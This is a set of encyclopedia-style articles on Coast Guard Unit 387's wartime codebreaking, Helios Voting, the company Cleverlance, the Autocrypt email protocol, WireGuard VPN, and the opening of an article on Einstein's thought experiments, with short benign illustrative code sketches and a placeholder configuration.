The United States Coast Guard Unit 387 became the official cryptanalytic unit of the Coast Guard in 1931, collecting communications intelligence for the Coast Guard, the U.S. Department of Defense, and the Federal Bureau of Investigation (FBI). Prior to becoming official, the unit worked under the U.S. Treasury Department intercepting communications during the prohibition. The unit was briefly absorbed into the U.S. Navy in 1941 during World War II (WWII) before returning to the Coast Guard following the war. The unit contributed to significant success in deciphering rum runner codes during the prohibition and later Axis agent codes during WWII, leading to the breaking of several code systems including the Green and Red Enigma machines. The Rise of Unit 387 The U.S. Coast Guard (USCG) Unit 387 was established in the 1920s as a small embedded unit of the USCG. It did not become an officially named unit until 1931, when it was named the USCG Unit 387 by Elizebeth Friedman. The United States government established this code-communications unit to intercept ship communications and track down prohibition law breakers because “rum runners” were increasingly using radio and code systems for communication. There was an increasing need for code-breaking and encoding capabilities to counter the rum runners, as they were sophisticated criminals attempting to intercept government communications as well. By 1927, the USCG intercepted hundreds of messages but lacked the resources and personnel needed for codebreaking. Therefore, the U.S. Treasury Department appointed William and Elizebeth Friedman, a couple famous for their work in cryptology, to create new code systems for the USCG operations against the prohibition violators and to decrypt the messages accumulating. The Friedmans were famous cryptographers with expansive careers in Washington DC for the U.S. Army, Navy, Treasury and Justice Departments throughout WWI and WWII.
In 1927, the rum runners commonly used two coding systems, switching them every six months. By mid-1930, rum runners had significantly increased their coding abilities, with virtually every rum boat using its own coding system. From April 1929 to January 1930, the San Francisco intelligence collection station alone intercepted 3,300 messages and discovered approximately 50 distinct secret coding systems which varied with up to five subsystems of codes and ciphers used by the rum runners. Between 1927 and 1928, the USCG unit successfully reduced the flow of illegal smuggling by 60 percent, from 14 million gallons of liquor to 5 million, by breaking these coding systems. An example of their successes took place on 29 September 1930, when the unit intercepted a message sent by a shore station in Vancouver, British Columbia intended for a rum runner operating in the Gulf of Mexico. The coded message contained five columns of 3-4 words each. When decoded by the unit, the message read “Henry cannot take goods now. Proceed 50 miles east Briton Island and give to Louis when he comes.” Their successes were in part due to the USCG interception and decryption capabilities, and their innovation in fusing together all-source intelligence such as human intelligence (HUMINT), imagery intelligence (IMINT) and communications intelligence (COMINT). The cryptanalytic unit used USCG patrol boats with high-frequency direction finding gear (HFDF, also nicknamed “Huff Duff”) created by William Friedman, and Elizebeth's code-breaking expertise to locate illicit radio stations and rum runners at sea. The USCG today credits these operations as the first tactical law enforcement use of COMINT in U.S. history. Elizebeth alone decrypted approximately 12,000 messages between rum runner networks over a three-year time span. The unit decrypted a total of approximately 25,000 messages per year during prohibition.
Following this success, the USCG requested that Elizebeth contribute more to their expanding operations, including codebreaking smugglers’ communications and aiding USCG partners such as the Customs Bureau and Secret Service. The U.S. Treasury Department officially transferred her to the Coast Guard in June 1931 to work as a cryptanalyst and to build up a new, official cryptanalytic unit within the Coast Guard. She began hiring and training young professionals to be cryptanalysts, women with expertise in stenography and men with backgrounds in physics, chemistry, or math. These young professionals trained in cryptanalysis officially became USCG Unit 387. The successful techniques in codebreaking and use of HFDF technology were later used by the unit in its clandestine operations in WWII, collecting information in Central and South America. Unit 387 Involvement in WWII Following the repeal of the prohibition, the USCG Unit 387 continued intercepting communications to counter smugglers attempting to evade liquor taxes and traffic narcotics. As the unit intercepted these communications, they discovered similar message traffic that, once decrypted, suggested non-neutral activities between Axis agents and Latin America. As worldwide aggression intensified in the 1930s, the U.S. Treasury Department requested Elizebeth Friedman and Unit 387 to officially shift focus from counter-narcotics to non-neutral communications in March 1938. The U.S. Treasury Department expanded the unit's functions to include monitoring ships and communications between Germany, Italy, and Central and South America. The U.S. Navy absorbed the USCG Unit 387 under the name OP-20-GU, and later OP-G-70, in 1941. The main responsibilities included monitoring worldwide clandestine radio intelligence and COMINT collection. 
Although the unit was unofficially conducting clandestine operations, the Coast Guard was officially assigned to clandestine operations outside of the Western Hemisphere, and within the Western Hemisphere in joint operations with the FBI, on 30 June 1942. The unit discovered that several commercial firms in Mexico and Central and South America were encrypting communications with Germany, breaking the neutrality laws. Throughout WWII, the unit used HFDF technology to intercept approximately 10,000 enemy communications from 65 German clandestine networks and played a key role in cracking the “Enigma G” code of the Green Enigma, the Red Enigma, the Berlin-Madrid Machine, and the Hamburg-Bordeaux Stecker codes. Their HFDF stations expanded to cover the United States with 20 primary stations, nine secondary stations, six contributory stations, and five Coast Guard radio stations. The USCG also had cutters, trucks, briefcases, and handbags with HFDF technology inside to track “wildcat” stations across the US. FBI Director J. Edgar Hoover believed that intercepting messages of German agents in Latin America would be instrumental in eliminating Nazi spy networks in the US. Therefore, the Coast Guard Unit 387 also aided the FBI in intercepting and decrypting messages beginning around May 1940. Unit 387 Efforts in Deciphering Codes In January 1940, the USCG Unit 387 intercepted suspicious circuits which transmitted one to five messages a day. Initially, the operators did not know the method or language of the enciphered text, which delayed success in attempts to solve the message codes. Once the Coast Guard intercepted sixty to seventy codes, it became apparent that the language used in the enciphered text was German and the encryption method used was likely a word separator. The operators knew the messages were in flush depth, a ciphering term which means the encrypted messages were correctly superimposed, each starting at the same point in the key.
They discovered that the intercepted messages were likely enciphered using a commercial Enigma machine due to the indicators of language used and the observation that “no plain letter was represented by itself in ciphered text.” The Coast Guard had a copy of the commercial version Enigma as well as manufacturer's instructions for use. The instructions hinted at the common practice of using “X” as a separator of words and using numbers to represent their equivalent letters as displayed on the keyboard of the Enigma machine. An example of this number-word pairing is “1-Q, 2-W, 3-E, 4-R, 5-T.” After discovering the first 32 alphabets, Unit 387 created a technique for solving the reflector and successive wheels of the commercial Enigma machine, giving them a complete solution to the full wiring of that machine. In 1940, the Coast Guard intercepted messages that were transmitted over a Mexico-Nauen circuit. When decrypted, the messages contained a series of numbers that represented pages and line numbers of a dictionary. The cryptanalytic unit discovered that two number series repeated at the end of several messages and after some experimentation, they realized the number series spelled out “Berlin” and “Bremen.” The unit used these values for other messages intercepted and deciphered additional words: two German agents' names, “Max” and “Glenn,” several ship names, departure dates, and types of cargo. The unit was able to figure out the alphabet and associated numbers for the messages sent over this circuit. Eventually the unit also located the dictionary used to encode the messages, titled “LANGENSCHEIDTS TASCHENWOERTERBUCH der spanischen und deutschen Sprache.” They were able to decode all other messages sent using the dictionary code following this discovery.
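The word-separator and keyboard-number conventions described above are simple enough to sketch. The code below encodes the pairs documented in the text (1-Q through 5-T); extending the mapping along the rest of the Enigma's QWERTZ top row, and the sample message, are assumptions for illustration:

```python
# Digits were typed as the letters in the same position on the Enigma's
# top keyboard row (QWERTZUIO on the German layout), and "X" separated words.
TOP_ROW = "QWERTZUIO"  # 1-Q, 2-W, 3-E, 4-R, 5-T, ... (rest assumed from the layout)
DIGIT_TO_LETTER = {str(i + 1): ch for i, ch in enumerate(TOP_ROW)}

def prepare_plaintext(message: str) -> str:
    """Encode digits as keyboard letters and spaces as X before enciphering."""
    out = []
    for ch in message.upper():
        if ch == " ":
            out.append("X")
        elif ch in DIGIT_TO_LETTER:
            out.append(DIGIT_TO_LETTER[ch])
        elif ch.isalpha():
            out.append(ch)
    return "".join(out)

assert prepare_plaintext("MEET AT 15") == "MEETXATXQT"
```

It was exactly such regularities, an X wherever a word boundary fell and keyboard letters standing in for digits, that gave the cryptanalysts cribs into the underlying Enigma traffic.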
Between 1940 and 1942, the Coast Guard intercepted messages between Latin America and Germany, most commonly using the Rudolph Mosse code and passing “to and from SUDAMERO and SUDAMERIAT, Mexico; SUDAMERIAT, Hamburg; and SUDAMVORST, SUDAMERO, and SUDAMERIAT, Berlin.” The Rudolph Mosse code is one in which the letters of each code group are transposed and a fixed alphabetic substitution is applied to each of the last two letters. These messages became known as the OPALU messages: Axis agents would send the indicator “OPALU” as the first group of letters before sending the message. In 1942, Unit 387, with the help of the Federal Communications Commission (FCC) and the Radio Security Service (RSS), intercepted messages sent between stations called TQI2 and TIM2. They believed TQI2 was in Europe and TIM2 was in South America. Between October and December that year, the unit intercepted 28 messages. Applying the lessons learned from solving the commercial Enigma machine and the new techniques passed on by the British, the unit was able to solve the Green Enigma machine encrypting these messages. The British had determined the wheel motion patterns used by many of the Enigma machines operated by German agents in Europe. Since Unit 387 had decrypted several messages between TQI2 and TIM2, whose text revealed that they were communications between Berlin and Argentina, the unit was able to apply the British techniques to determine this new machine's wheel motion patterns and the monthly ring settings the agents used to encrypt the messages. The unit had an idea of the wheel patterns and monthly ring settings by January 1943, which was confirmed by messages sent between Berlin and Argentina in June and July that year. Following these messages, they knew they had cracked the Green Enigma machine. Following this success, the unit intercepted more communications between Argentina and Berlin encrypted on the Green Enigma on 4 November 1943.
Using the known keys, the unit revealed the following message: “THE TRUNK TRANSMITTER WITH ACCESSORIES AND ENIGMA ARRIVED VIA RED. THANK YOU VERY MUCH. FROM OUR MESSAGE 150 WE SHALL ENCIPHER WITH THE NEW ENIGMA. WE SHALL GIVE THE OLD DEVICE TO GREEN. PLEASE ACKNOWLEDGE BY RETURN MESSAGE WITH NEW ENIGMA.” Messages were then sent from Berlin to Argentina confirming the arrival of the new Enigma machine. The Axis agents encoded these messages using the Kryha machine, of which the Coast Guard already had the keys. After reading the series of messages sent by German agents from Berlin to Latin America talking of new “Red” section keys, the unit decrypted the Red Enigma machine using similar methods. See also Signals intelligence US Army SIS OP-20-G References Cryptography organizations United States Coast Guard Defunct United States intelligence agencies Signals intelligence agencies Signals intelligence of World War II
57205678
https://en.wikipedia.org/wiki/Helios%20Voting
Helios Voting
Helios Voting is an open-source, web-based electronic voting system. Users can vote in elections and users can create elections. Anyone can cast a ballot; however, for the final vote to be counted, the voter's identification must be verified. Helios uses homomorphic encryption to ensure ballot secrecy. It was created by Ben Adida, a software engineer involved in other projects such as Creative Commons and Mozilla Persona. Characteristics Helios allows registered users to create elections. Each account requires an email address, a name, and a password. The registered user can then create an election by specifying a name and time period. The user who created the election is known as the administrator of the election. Once an election is created, Helios provides a public key to the administrator. The administrator prepares the ballot and creates a voter roll; these can be edited at any time before voting starts. The administrator freezes the election when it is ready for voters to cast ballots. When the election is frozen, no changes can be made to the ballot, voter roll, or election time frame. Source code The front-end browser code is written in JavaScript and HTML, while the back-end server code is written in Python. The Ballot Preparation System (BPS) guides voters through the ballot and records their choices. The process to create the ballot and process the votes is based on Benaloh's Simple Verifiable Voting Protocol. Both frontend and backend are free software: the backend is released under the Apache 2.0 license, while the frontend is released under the GNU GPL v3+. Voting process A voter, from the voting roll created by the administrator, receives an email with the voter's username, a random password for that specific election, a URL to the voting booth, and a SHA-1 hash of the election parameters. The voter follows the link in the email and begins the voting process.
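The hash of the election parameters mentioned above can be sketched as follows; the field names and the use of canonical JSON are assumptions for illustration, not Helios's actual serialization:

```python
import hashlib
import json

# Hypothetical sketch of the "hash of the election parameters" a voter
# receives: a SHA-1 digest over a canonical serialization of the frozen
# election definition. Field names are invented for illustration.
def election_fingerprint(params: dict) -> str:
    canonical = json.dumps(params, sort_keys=True, separators=(",", ":"))
    return hashlib.sha1(canonical.encode("utf-8")).hexdigest()

fp = election_fingerprint({
    "name": "Student Council",
    "voting_starts_at": "2024-05-01T08:00:00Z",
    "voting_ends_at": "2024-05-02T20:00:00Z",
})
```

Because the serialization is canonical (sorted keys, fixed separators), any party recomputing the digest over the same frozen parameters obtains the same 40-hex-digit fingerprint, which is what lets voters check they are voting in the election the administrator froze.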
Once the voter finishes and has reviewed the ballot, the voter seals the ballot, which triggers Helios to encrypt it and display a ciphertext. At this point the voter can either audit or cast the ballot. Auditing the ballot allows the voter to verify that the ciphertext is correct. Once ballot auditing is complete, that ballot is discarded (to provide some protection against vote-buying and coercion) and a new ballot is constructed. When the voter is ready to cast their ballot, they must provide their login information. Helios authenticates the voter's identity and the ballot is cast. All votes are posted to a public online bulletin board which displays either a voter name or a voter ID number with the encrypted vote. Tallying process After an election ended, the Helios 1.0 system shuffled the ballots, decrypted all the votes, and made the shuffle publicly accessible for interested parties to audit. Auditing allowed anyone to verify that the shuffle was correct. Once a reasonable amount of time for auditing had passed, Helios decrypted the ballots and tallied the votes. Anyone could download the election data to verify that the shuffle, decryptions, and tally were correct. Helios 2.0, designed in 2008 and currently in use, abandoned the shuffling and switched to a homomorphic encryption scheme proposed by Cramer, Gennaro and Schoenmakers. System limitations The Helios platform is intended to be used in low-coercion, small-scale environments such as university student governments. The following limitations are known. Privacy The centralized server must be trusted not to violate ballot secrecy; this limitation can be mitigated by distributing trust amongst several stakeholders. Resistance to coercion and vote-buying is only ensured when the material used to construct ballots (more precisely, nonces) is unknown to voters, e.g., when trusted devices are used to construct ballots.
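The homomorphic tallying that Helios 2.0 relies on can be sketched with textbook exponential ElGamal, where multiplying ciphertexts adds the underlying votes. This is an illustrative toy with deliberately insecure parameters and a single trustee, not Helios's actual code:

```python
import random

# Toy additively homomorphic (exponential) ElGamal tally of 0/1 votes, in the
# spirit of the scheme Helios 2.0 uses. Tiny insecure parameters and a single
# trustee, for illustration only.
p = 1019                      # small safe prime; subgroup order q = 509
q = 509
g = 4                         # generator of the order-q quadratic residues
x = random.randrange(1, q)    # trustee's secret key
h = pow(g, x, p)              # election public key

def encrypt(vote):
    r = random.randrange(1, q)
    return (pow(g, r, p), pow(g, vote, p) * pow(h, r, p) % p)

def combine(c1, c2):
    # Multiplying ciphertexts component-wise adds the encrypted votes.
    return (c1[0] * c2[0] % p, c1[1] * c2[1] % p)

def decrypt_tally(c, max_votes):
    gm = c[1] * pow(c[0], -x, p) % p      # recover g^(sum of votes)
    for m in range(max_votes + 1):        # small discrete log by search
        if pow(g, m, p) == gm:
            return m
    raise ValueError("tally out of range")

ballots = [encrypt(v) for v in (1, 0, 1, 1, 0)]
total = ballots[0]
for b in ballots[1:]:
    total = combine(total, b)
```

Here `decrypt_tally(total, len(ballots))` returns 3 without any individual ballot ever being decrypted; in a real deployment the group is large, decryption is distributed among trustees, and voters attach zero-knowledge proofs that each ballot encrypts 0 or 1.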
Verifiability The ballot auditing/reconstruction device must be trusted to ensure successful ballot auditing (also known as cast-as-intended verifiability); this limitation can be mitigated by distributing auditing checks amongst several devices, only one of which must be trusted. Security In 2010 researchers identified a ballot secrecy vulnerability. In 2011 and 2016 researchers identified cross-site scripting vulnerabilities. The first endangered administrator sessions and was promptly patched. For the second, if the attacker is able to get a voter to click a specially crafted link, the voter will land on a modified Helios page which can violate ballot secrecy or manipulate votes. It is unclear whether the vulnerability has been fixed as of 2019. History Adoption In 2009 the Université catholique de Louvain used Helios to elect its university president (of around 25,000 eligible voters, some 5,000 registered and 4,000 voted). In the same year Princeton University also adopted it to elect student governments. Since 2010, the International Association for Cryptologic Research has used Helios annually to elect board members. In 2014 the Association for Computing Machinery used Helios for their general election. References Free software Electronic voting methods
57218462
https://en.wikipedia.org/wiki/Cleverlance%20Enterprise%20Solutions
Cleverlance Enterprise Solutions
Cleverlance Enterprise Solutions a.s. is an information technology company headquartered in the Czech Republic, with branch offices in Prague, Brno, Bratislava and Bremen. Cleverlance develops its own products, integrates IT platforms and provides analytical services as well as software testing. Cleverlance offers these services to clients ranging from financial institutions, through telecommunications, to the power and automotive industries. On 30 October 2017, Cleverlance became a member of the Association of Virtual and Augmented Reality and is currently working on several applications of VR and AR. History Origins Cleverlance was founded in 1999, in Czechia, as a company specializing in development for the Java EE platform. The founding members were Jakub Dosoudil, Jan Šeda and Dobromil Podpěra. Jan Šeda later sold his share in the company to the other founders. In 2004, Cleverlance Group was founded. Death of Dosoudil During the 2004 Christmas holidays, one of the founding members of Cleverlance, Jakub Dosoudil (27 years old at the time), went to Thailand with his girlfriend Michaela Beránková (25 years old at the time, also working for Cleverlance). They died in the Indian Ocean tsunami, which killed almost 230,000 people. After Dosoudil and Beránková had been reported missing, the remaining employees and owners of Cleverlance, along with the couple's families, tried to find them. Their bodies were found and identified in 2005. The deaths of Dosoudil and Beránková were a huge loss for the company and created a very chaotic situation overall. Later development In 2017, the annual revenue of the company crossed 1 billion Czech crowns. In 2019, the KKCG group became the new majority owner. Invinit Group Invinit Group (formerly known as Cleverlance Group) is a family of different IT companies, connected to the founding firm Cleverlance and dealing with many different aspects of information technology.
Apart from Cleverlance Enterprise Solutions, the companies include: AEC AEC is a Czech IT company, created in 1991, which deals with various facets of cyber security. AEC became a member of Cleverlance Group in 2007, through an acquisition agreement between the companies. Eicero Eicero became a member of Cleverlance Group in 2010. The company deals in the complex diagnostics of photovoltaic power stations and the elimination of PID (potential-induced degradation), which lowers the output of a given power station. The main product of Eicero is PID Doctor, a device that regenerates photovoltaic panels damaged by PID and restores their performance. TrustPort TrustPort is a provider and developer of computer security solutions. TrustPort products are based on antivirus and encryption technologies, anti-spam methods and AI techniques for monitoring anomalous behavior. TrustPort became a member of the group in March 2008. The company was created as an independent entity within Cleverlance Group after the acquisition of AEC, from which TrustPort was spun off. IT education Cleverlance periodically holds so-called Academies, in which members of the public can learn about specific IT topics and be granted a certificate after completing an intense crash course. After the course is completed, the best-scoring participants are offered a job at Cleverlance. The most frequently held Academies are the Testing Clever Academy, designed to teach attendees the ins and outs of IT testing within a single week, and the Testing Java Academy, focused on developers early in their careers. Cleverlance also organizes education academies for the .NET and database technologies. Name of the company The name is a combination of the words "clever" and "lance", which both have connotations of sharpness. The name was thought up by the founding member Jakub Dosoudil while on vacation in Mexico. References Information technology companies of the Czech Republic
57248228
https://en.wikipedia.org/wiki/Autocrypt
Autocrypt
Autocrypt is a cryptographic protocol for email clients that aims to simplify key exchange and enable encryption. Version 1.0 of the Autocrypt specification was released in December 2017 and makes no attempt to protect against MITM attacks. It is implemented on top of OpenPGP, replacing its complex key management with fully automated, unsecured exchange of cryptographic keys between peers. Method Autocrypt-capable email clients transparently negotiate encryption capabilities and preferences and exchange keys between users alongside sending regular emails. This is done by including the key material and encryption preferences in the header of each email, which allows encrypting any message to a contact who has previously sent the user email. This information is not signed or verified in any way, even if the actual message is encrypted and verified. No support is required from email providers other than preserving and not manipulating the Autocrypt-specific header fields. When a message is encrypted to a group of recipients, keys are also automatically sent to all recipients in this group. This ensures that a reply to a message can be encrypted without any further complications or work by the user. Security model Autocrypt is guided by the idea of opportunistic security from RFC 7435, but implements something much less secure than a trust on first use (TOFU) model. Encryption of messages between Autocrypt-capable clients can be enabled without further need of user interaction. Traditional OpenPGP applications should display a noticeable warning if keys are not verified either manually or by a web of trust method before use. In contrast, Autocrypt completely forgoes any kind of key verification. Keys are exchanged during the initial handshake, and valid or invalid keys of peers may be replaced at any later time without any user interaction or verification.
This makes it very easy to exchange new keys if a user loses access to a key, but also makes the protocol much more susceptible to man-in-the-middle attacks than clean TOFU. The underlying OpenPGP implementation often makes it possible for the user to perform manual out-of-band key verification; however, by design users are never alerted if Autocrypt changed the keys of peers. Autocrypt tries to maximize the possible opportunities for encryption, but is not aggressive about encrypting messages at all possible opportunities. Instead, encryption is only enabled by default if all communicating parties consent, allowing users to make themselves available for encrypted communication without getting in the way of their established workflows. Man-in-the-middle attacks are not preventable in this security model, which is controversial. Any attacker who can send emails with a forged sender address can cause encryption keys to be replaced by keys of the attacker's choice and/or deliberately turn off encryption. Technical details Autocrypt uses the established OpenPGP specification as its underlying data format. Messages are encrypted using AES and RSA keys, with a recommended RSA key length of 3072 bits. These mechanisms are chosen for maximum compatibility with existing OpenPGP implementations. There are plans for moving to smaller elliptic-curve keys when support is more widely available. Support Kontact since version 21.04. No longer functional: Thunderbird extension Enigmail since version 2.0. Delta Chat messenger from version 0.9.2. K-9 Mail Android mail app has support since version 5.400 (reportedly broken until version 5.717). No longer functional: Autocrypt extension in Thunderbird. The German email provider Posteo also supports Autocrypt, by additionally cryptographically signing outbound Autocrypt metadata via DKIM. The popular free email client Thunderbird refuses to adopt the standard and its whole approach of fully automated E2E email encryption.
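The header-based key transport described under Method can be sketched as follows, following the attribute layout of the Autocrypt Level 1 specification (addr first, keydata last); the key bytes here are a placeholder, not a real OpenPGP key:

```python
import base64

# Sketch of the Autocrypt header an enabled client adds to outgoing mail.
# Attribute order follows the Autocrypt Level 1 spec: addr first, keydata
# last. The key bytes passed in below are a placeholder, not a real key.
def autocrypt_header(addr, keydata, prefer_encrypt_mutual=True):
    attrs = ["addr=" + addr]
    if prefer_encrypt_mutual:
        attrs.append("prefer-encrypt=mutual")
    attrs.append("keydata=" + base64.b64encode(keydata).decode("ascii"))
    return "Autocrypt: " + "; ".join(attrs)

hdr = autocrypt_header("alice@example.org", b"placeholder-openpgp-key-bytes")
```

A receiving client that parses such a header simply stores the key for `addr` and may use it for the next reply, which is the whole of Autocrypt's key exchange: no signature, no fingerprint check, no user interaction.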
Further reading Autocrypt - in: Bertram, Linda A. / Dooble, Gunther van / et al. (Eds.): Nomenclatura: Encyclopedia of modern Cryptography and Internet Security - From AutoCrypt and Exponential Encryption to Zero-Knowledge-Proof Keys, 2019. OpenPGP Transformation of Cryptography: Fundamental concepts of Encryption The New Era Of Exponential Encryption: - Beyond Cryptographic Routing External links Autocrypt website Autocrypt 1.0 specification References Cryptographic software Security
57257634
https://en.wikipedia.org/wiki/WireGuard
WireGuard
WireGuard is a communication protocol and free and open-source software that implements encrypted virtual private networks (VPNs), and was designed with the goals of ease of use, high speed performance, and low attack surface. It aims for better performance and more power than IPsec and OpenVPN, two common tunneling protocols. The WireGuard protocol passes traffic over UDP. In March 2020, the Linux version of the software reached a stable production release and was incorporated into the Linux 5.6 kernel, and backported to earlier Linux kernels in some Linux distributions. The Linux kernel components are licensed under the GNU General Public License (GPL) version 2; other implementations are under GPLv2 or other free/open-source licenses. Protocol WireGuard uses the following: Curve25519 for key exchange ChaCha20 for symmetric encryption Poly1305 for message authentication codes SipHash for hashtable keys BLAKE2s for cryptographic hash function UDP-based only In May 2019, researchers from INRIA published a machine-checked proof of WireGuard, produced using the CryptoVerif proof assistant. Optional Pre-shared Symmetric Key Mode WireGuard supports pre-shared symmetric key mode, which provides an additional layer of symmetric encryption to mitigate any future advances in quantum computing. The risk being that traffic is stored until quantum computers are capable of breaking Curve25519; at which point traffic could be decrypted. Pre-shared keys are "usually troublesome from a key management perspective and might be more likely stolen", but in the shorter term, if the symmetric key is compromised, the Curve25519 keys still provide more than sufficient protection. Networking WireGuard only uses UDP and thus does not work in networks that block UDP traffic. This is unlike alternatives like OpenVPN because of the many disadvantages of TCP-over-TCP routing. WireGuard fully supports IPv6, both inside and outside of tunnel. 
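The protocol and networking model described above translate into a very small configuration surface. A minimal point-to-point setup in the widely used wg-quick INI format looks like the sketch below; all keys, addresses, and the hostname are placeholders, not values from the source:

```ini
# Minimal point-to-point sketch (wg-quick format); keys are placeholders.
[Interface]
PrivateKey = <peer-A-private-key-base64>
Address = 10.0.0.1/24
ListenPort = 51820

[Peer]
PublicKey = <peer-B-public-key-base64>
# Optional pre-shared symmetric key, the post-quantum hedge described above:
PresharedKey = <optional-psk-base64>
AllowedIPs = 10.0.0.2/32
Endpoint = peer-b.example.com:51820
```

Each `[Peer]` block pairs a Curve25519 public key with the tunnel-internal addresses (`AllowedIPs`) that may appear behind it, which is how WireGuard binds cryptographic identity to routing.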
It supports only layer 3 for both IPv4 and IPv6 and can encapsulate v4-in-v6 and vice versa. WireGuard supports multiple topologies: Point-to-point Star (server/client) A client endpoint does not have to be defined before the client starts sending data. Client endpoints can be statically predefined. Mesh Extensibility Excluding such complex features from the minimal core codebase improves its stability and security. For ensuring security, WireGuard restricts the options for implementing cryptographic controls, limits the choices for key exchange processes, and maps algorithms to a small subset of modern cryptographic primitives. If a flaw is found in any of the primitives, a new version can be released that resolves the issue. Also, configuration settings that affect the security of the overall application cannot be modified by unprivileged users. Reception WireGuard aims to provide a simple and effective virtual private network implementation. A 2018 review by Ars Technica observed that popular VPN technologies such as OpenVPN and IPsec are often complex to set up, disconnect easily (in the absence of further configuration), take substantial time to negotiate reconnections, may use outdated ciphers, and have relatively massive code bases of over 400,000 and 600,000 lines of code, respectively, which hinders debugging. WireGuard's design seeks to reduce these issues, aiming to make the tunnel more secure and easier to manage by default. By using versioning of cryptography packages, it focuses on ciphers believed to be among the most secure current encryption methods, and at the time of the Ars Technica review had a codebase of around 4000 lines of kernel code, about 1% of either OpenVPN or IPsec, making security audits easier. WireGuard was praised by Linux kernel creator Linus Torvalds who called it a "work of art" in contrast to OpenVPN and IPsec. 
Ars Technica reported that in testing, stable tunnels were easily created with WireGuard, compared to alternatives, and commented that it would be "hard to go back" to long reconnection delays, compared to WireGuard's "no nonsense" instant reconnections. Oregon senator Ron Wyden has recommended to the National Institute of Standards and Technology (NIST) that they evaluate WireGuard as a replacement for existing technologies like IPsec and OpenVPN. Availability Implementations Implementations of the WireGuard protocol include: Donenfeld's initial implementation, written in C and Go. Cloudflare's BoringTun, a user space implementation written in Rust. Matt Dunwoodie's implementation for OpenBSD, written in C. Ryota Ozaki's wg(4) implementation, for NetBSD, is written in C. The FreeBSD implementation is written in C and shares most of the data path with the OpenBSD implementation. Native Windows kernel implementation named "wireguard-nt", since August 2021 OPNsense via standard package os-WireGuard pfSense via standard package (pfSense-pkg-WireGuard) (A Netgate-endorsed community package) Linux support User space programs supporting WireGuard include: NetworkManager since version 1.16 systemd since version 237 Intel's ConnMan since version 1.38 IPVanish VPN since version 3.7.4.0 Mozilla VPN (with Mullvad) NOIA Network NordVPN via Nordlynx Veeam Powered Network v2, since May 2019 PiVPN since 17 October 2019 VPN Unlimited since November 2019 Private Internet Access VPN since 10 April 2020 hide.me CLI VPN client since July 20, 2020 Surfshark since October 2020 Mistborn (software) VPN since March 2020 Oracle Linux with "Unbreakable Enterprise Kernel" Release 6 Update 1, since November 2020 oVPN since Feb 2020, roll-out in 2021 Torguard since 2020 Vypr VPN since May 2020 Windscribe in 2020 Trust.zone VPN since February 2021 ProtonVPN since October 2021 History Early snapshots of the code base exist from June 30, 2016. 
Four early adopters of WireGuard were the VPN service providers Mullvad, AzireVPN, IVPN and cryptostorm. WireGuard has received donations from Mullvad, Private Internet Access, IVPN, the NLnet Foundation and, more recently, OVPN. Before the stable release, the developers of WireGuard advised treating the code and protocol as experimental, and cautioned that they had not yet achieved a stable release compatible with CVE tracking of any security vulnerabilities that might be discovered. On 9 December 2019, David Miller, primary maintainer of the Linux networking stack, accepted the WireGuard patches into the "net-next" maintainer tree, for inclusion in an upcoming kernel. On 28 January 2020, Linus Torvalds merged David Miller's net-next tree, and WireGuard entered the mainline Linux kernel tree. On 20 March 2020, Debian developers enabled the module build options for WireGuard in their kernel config for the Debian 11 version (testing). On 29 March 2020, WireGuard was incorporated into the Linux 5.6 release tree. The Windows version of the software remains in beta. On 30 March 2020, Android developers added native kernel support for WireGuard in their Generic Kernel Image. On 22 April 2020, NetworkManager developer Beniamino Galvani merged GUI support for WireGuard. On 12 May 2020, Matt Dunwoodie proposed patches for native kernel support of WireGuard in OpenBSD. On 22 June 2020, after the work of Matt Dunwoodie and Jason A. Donenfeld, WireGuard support was imported into OpenBSD. On 23 November 2020, Jason A. Donenfeld released an update of the Windows package improving installation, stability, ARM support, and enterprise features. On 29 November 2020, WireGuard support was imported into the FreeBSD 13 kernel. On 19 January 2021, WireGuard support was added for preview in pfSense Community Edition (CE) 2.5.0 development snapshots.
In March 2021, kernel-mode WireGuard support was removed from FreeBSD 13.0, still in testing, after an urgent code cleanup in FreeBSD WireGuard could not be completed quickly. FreeBSD-based pfSense Community Edition (CE) 2.5.0 and pfSense Plus 21.02 removed kernel-based WireGuard as well. In May 2021, WireGuard support was re-introduced back into pfSense CE and pfSense Plus development snapshots as an experimental package written by a member of the pfSense community, Christian McDonald. The WireGuard package for pfSense incorporates the ongoing kernel-mode WireGuard development work by Jason A. Donenfeld that was originally sponsored by Netgate In June 2021, the official package repositories for both pfSense CE 2.5.2 and pfSense Plus 21.05 included the WireGuard package See also Comparison of virtual private network services Secure Shell (SSH), a cryptographic network protocol used to secure services over an unsecured network. Notes References External links Free security software Linux network-related software Tunneling protocols Virtual private networks
57264039
https://en.wikipedia.org/wiki/Einstein%27s%20thought%20experiments
Einstein's thought experiments
A hallmark of Albert Einstein's career was his use of visualized thought experiments as a fundamental tool for understanding physical issues and for elucidating his concepts to others. Einstein's thought experiments took diverse forms. In his youth, he mentally chased beams of light. For special relativity, he employed moving trains and flashes of lightning to explain his most penetrating insights. For general relativity, he considered a person falling off a roof, accelerating elevators, blind beetles crawling on curved surfaces and the like. In his debates with Niels Bohr on the nature of reality, he proposed imaginary devices intended to show, at least in concept, how the Heisenberg uncertainty principle might be evaded. In a profound contribution to the literature on quantum mechanics, Einstein considered two particles briefly interacting and then flying apart so that their states are correlated, anticipating the phenomenon known as quantum entanglement. Introduction A thought experiment is a logical argument or mental model cast within the context of an imaginary (hypothetical or even counterfactual) scenario. A scientific thought experiment, in particular, may examine the implications of a theory, law, or set of principles with the aid of fictive and/or natural particulars (demons sorting molecules, cats whose lives hinge upon a radioactive disintegration, men in enclosed elevators) in an idealized environment (massless trapdoors, absence of friction). They describe experiments that, except for some specific and necessary idealizations, could conceivably be performed in the real world. As opposed to physical experiments, thought experiments do not report new empirical data. They can only provide conclusions based on deductive or inductive reasoning from their starting assumptions. Thought experiments invoke particulars that are irrelevant to the generality of their conclusions.
It is the invocation of these particulars that gives thought experiments their experiment-like appearance. A thought experiment can always be reconstructed as a straightforward argument, without the irrelevant particulars. John D. Norton, a well-known philosopher of science, has noted that "a good thought experiment is a good argument; a bad thought experiment is a bad argument." When effectively used, the irrelevant particulars that convert a straightforward argument into a thought experiment can act as "intuition pumps" that stimulate readers' ability to apply their intuitions to their understanding of a scenario. Thought experiments have a long history. Perhaps the best known in the history of modern science is Galileo's demonstration that falling objects must fall at the same rate regardless of their masses. This has sometimes been taken to be an actual physical demonstration, involving his climbing up the Leaning Tower of Pisa and dropping two heavy weights off it. In fact, it was a logical demonstration described by Galileo in Discorsi e dimostrazioni matematiche (1638). Einstein had a highly visual understanding of physics. His work in the patent office "stimulated [him] to see the physical ramifications of theoretical concepts." These aspects of his thinking style inspired him to fill his papers with vivid practical detail, making them quite different from, 